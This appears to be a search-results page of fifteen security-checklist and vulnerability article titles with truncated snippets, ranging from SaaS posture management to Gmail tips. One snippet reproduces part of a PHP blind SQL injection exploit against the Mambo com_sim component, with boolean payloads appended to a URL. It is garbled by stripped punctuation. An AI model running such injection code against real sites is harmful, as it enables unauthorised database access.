15 matches found
The Ultimate SaaS Security Posture Management Checklist, 2025 Edition
Since the first edition of The Ultimate SaaS Security Posture Management (SSPM) Checklist was released three years ago, the corporate SaaS sprawl has been growing at a double-digit pace. In large enterprises, the number of SaaS applications in use today is in the hundreds, spread across departmenta...
Holiday Readiness, Part Two: What you Should be Thinking About Three Months Out - Capacity Planning
Welcome back to the Holiday Readiness blog series. We hope part one has kept you busy over the past month as you continue to improve your security posture. If you haven't finished all of the security checklist items, don't worry - there is still time before Black Friday and Cyber Monday...
Holiday Readiness: What You Should Be Thinking About Four Months Out
Written by: Michael Hansen. This is a blog series about Akamai solutions that can help you manage the surge of traffic, both good and bad, that will be hitting the retail industry during the holiday season. The beginning of August is upon us, and if you haven't already started thinking about the...
Post-Pandemic world, Shut-downs, and Web Security Connections
As the anniversary of the World Health Organization’s (WHO) declaration of the COVID-19 pandemic approaches, we, here in Silicon Valley, have great hope for 2021. As the vaccine distribution continues to trickle to Main Street, Californians have recently exited a stay-at-home mandate that has nearl...
COVID-19 CISO Checklist for Securing a Remote Workforce
The Coronavirus crisis introduces a heavy burden on the CISO with the joint impact of a mass transition to working remotely coupled with a surge of cyberattacks that strive to monetize the general chaos. Security vendors, unintendedly, contribute to this burden by a relentless generation of noise...
Airflowscan - Checklist And Tools For Increasing Security Of Apache Airflow
Checklist and tools for increasing security of Apache Airflow. DISCLAIMER This project is NOT AFFILIATED with the Apache Foundation and the Airflow project, and is not endorsed by them. Contents The purpose of this project is to provide tools to increase security of Apache Airflow installations. This...
XXE Vulnerability
This is: - a bugfix - a new feature - X security Checklist: - X Changes are covered by unit tests - X Code style is respected - X Commit message explains why the change is made see https://github.com/erlang/otp/wiki/Writing-good-commit-messages - X CHANGELOG.md contains a short summary of the...
PHP Security Check List
PHP: Hypertext Preprocessor is a web-based, server-side, multi-use, general-purpose, scripting and programming language that can be embedded in HTML. The PHP development, which was first created by Rasmus Lerdorf in 1995, is now being run by the PHP community. The PHP programming language is stil...
Electronegativity - Tool To Identify Misconfigurations And Security Anti-Patterns In Electron Applications
Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications. It leverages AST and DOM parsing to look for security-relevant configurations, as described in the "Electron Security Checklist - A Guide for Developers and Auditors" whitepaper...
HTTPS client certificate authentication security issues. Part 1/3
Sometimes we need to improve web authentication by client certificates. It’s much better than passwords, allows to enable 2nd factor because of hardware keys and just sounds so strong, isn’t it? Let’s look inside it to understand how secure is it and what to check to be sure, that you didn’t...
Back to school cybersecurity tips for parents and kids
The time to start the new school term is just around the corner. And for parents, the excitement and anxiety may be palpable, especially if it's their kid's first time attending a new school. Ads for back-to-school gear start as early as July, increasing in frequency and urgency until the kiddos...
Fedora Update for postfix FEDORA-2011-6777
The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptxrefname:"URL",...
Google Unveils Gmail Security Checklist
In the face of continued attacks targeting its hugely popular Gmail service, Google has put together a checklist to help Gmail users better secure their accounts by looking at the settings in their inboxes, their browsers and their PCs. The security guide doesn’t automate any of these tasks for...
Mambo Component com_sim 0.8 - Blind SQL Injection
Mambo Component comsim 0.8 - Blind SQL Injection xoron 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...
Oracle 11g/10g Installation Vulnerability
Hey all, After investigating 11g the other day I came across an interesting issue. During the installation of Oracle 11g and 10g all accounts, including the SYS and SYSTEM accounts, have their default passwords and only at the end of the install are the passwords changed. This means that there is...